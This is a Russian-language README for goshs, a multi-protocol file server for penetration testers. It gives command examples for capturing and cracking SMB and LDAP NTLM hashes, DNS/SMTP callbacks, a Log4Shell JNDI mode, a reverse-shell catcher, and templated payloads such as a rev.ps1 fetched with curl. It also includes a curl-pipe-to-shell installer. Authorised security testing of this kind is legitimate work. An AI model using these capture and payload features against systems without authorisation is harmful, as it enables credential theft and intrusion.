
Многофункциональный файловый сервер в одном бинарном файле для специалистов red team и разработчиков. HTTP/S · WebDAV · FTP/SFTP · SMB · LDAP/S · NTLM hash capture · DNS/SMTP callbacks · TLS · Auth · Share links. Мощная замена python3 -m http.server.
Вы в середине пентеста. Вам нужно передать файл, перехватить SMB-хэш или быстро поднять HTTPS-сервер — а python3 -m http.server для этого не подойдёт.
goshs — это файловый сервер в одном бинарнике, созданный для моментов, когда вам нужно больше, чем Python SimpleHTTPServer, но не хочется настраивать Apache. HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S, базовая аутентификация, ссылки для обмена, DNS/SMTP-колбэки, перехват и взлом NTLM-хэшей — всё одной командой.


Попробуйте сами: demo.goshs.de

# Раздать текущую директорию на порту 8000
goshs
# Запуск с HTTPS (самоподписанный) и базовой аутентификацией
goshs -s -ss -b user:password
# Перехват SMB-хэшей
goshs -smb -smb-domain CORP
# Перехват учётных данных LDAP и NTLM-хэшей (с опциональным взломом по словарю)
goshs -ldap
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# Перехват DNS-колбэков и приём email
goshs -dns -dns-ip 1.2.3.4 -smtp -smtp-domain your-domain.com
# Самоуничтожение через 2 часа
goshs --ttl 2h
# Запуск с интерактивной терминальной панелью (отлично для headless SSH-сессий)
goshs --tui
# Раздача пейлоадов, которые автоматически подставляют ваш callback-хост/порт при скачивании
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# получить отрендеренный файл: curl 'http://10.10.14.7:8000/rev.ps1?tpl'
Подробная документация доступна на docs.goshs.de
goshs может установить автодополнение по Tab для bash, fish и zsh:
goshs --completion bash
goshs --completion fish
goshs --completion zsh
На macOS с Homebrew автоматически используется корректный путь Homebrew. После установки команда выводит точную инструкцию по активации, например:
source ~/.local/share/bash-completion/completions/goshs
Встроенные веб-ресурсы уже включены в репозиторий, поэтому обычная сборка просто работает:
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
Если вы изменяете исходники JavaScript или SCSS, сначала пересоберите ресурсы с установленными esbuild и sass:
make generate
go build -o goshs .
Это замечательные контрибьюторы, которые сделали goshs ещё безопаснее ❤️
Присоединяйтесь к Discord-сообществу и начинайте общаться.
Особая благодарность sc0tfree за вдохновение для этого проекта его проектом updog, написанным на Python.
| 📁 Файловые операции | Скачивание (с докачкой и перемоткой через HTTP Range), загрузка (drag & drop, POST/PUT), удаление, массовый ZIP, QR-коды |
| 🔌 Протоколы | HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S |
| 🔒 Аутентификация и безопасность | Базовая аутентификация, аутентификация по сертификату, TLS (самоподписанный, Let's Encrypt, собственный сертификат), IP-белый список, ACL на основе файлов |
| ⚙️ Режимы сервера | Только чтение, только загрузка, без удаления, тихий, невидимый, выполнение CLI-команд, TTL-самоуничтожение |
| 🔗 Ссылки для обмена | Обмен на основе токенов, лимит скачиваний, лимит по времени |
| 🎯 Совместная работа / CTF | Живой командный чат (markdown, эмодзи + автоподсказки :shortcodes:, вставка изображений, загрузка файлов, реакции, редактирование сообщений, опциональное сохранение на диск — общий web ↔ TUI), DNS-сервер, SMTP-сервер, перехват и взлом SMB NTLM-хэшей, перехват учётных данных LDAP и взлом NTLM-хэшей (режим JNDI для Log4Shell), redirect-эндпоинт, перехватчик реверс-шеллов + генератор пейлоадов |
| 🧩 Шаблонизация пейлоадов | Подстановка {{.LHOST}}/{{.LPORT}} + пользовательских значений --tpl-var в раздаваемые файлы по запросу (?tpl) |
| 🔔 Интеграция | Webhooks, туннель через localhost.run, конфигурационный файл, JSON API, mDNS |
| 🖥️ TUI-панель | Интерактивная полноэкранная терминальная панель; живые панели для HTTP, DNS, SMB, LDAP, SMTP, реверс-шеллов и командного чата; подключение и апгрейд шеллов из терминала |
| 🛠️ Прочее | Тёмная/светлая темы, командный чат, самообновление, вывод логов, встраивание файлов, сброс привилегий |
| Метод |
|---|
| 🐧 curl | sh | curl -sSfL https://goshs.de/install.sh | sh |
| 🦫 Go | go install goshs.de/goshs/v2@latest |
| 🐉 Kali и Parrot OS | sudo apt install goshs |
| 🎗️ Arch Linux (AUR) | yay -S goshs-bin |
| 🖤 BlackArch | pacman -S goshs |
| 🏔️ Alpine Linux (edge) | apk add goshs |
| 🫙 Snap | snap install goshs |
| 🎩 Fedora / RHEL (COPR) | dnf copr enable goshs-labs/goshs && dnf install goshs |
| 🦎 openSUSE | sudo zypper install goshs |
| ❄️ Nix / NixOS | nix-env -iA nixpkgs.goshs |
| 🍺 Homebrew | brew install goshs |
| 🪟 Scoop | scoop bucket add extras && scoop install extras/goshs |
| 🪟 winget | winget install GoshsLabs.Goshs |
| 🍫 Chocolatey | choco install goshs |
| 🐳 Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
| 📦 Релиз | Скачать с GitHub Releases |
![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | wooseokdotkim | Guilhem7 |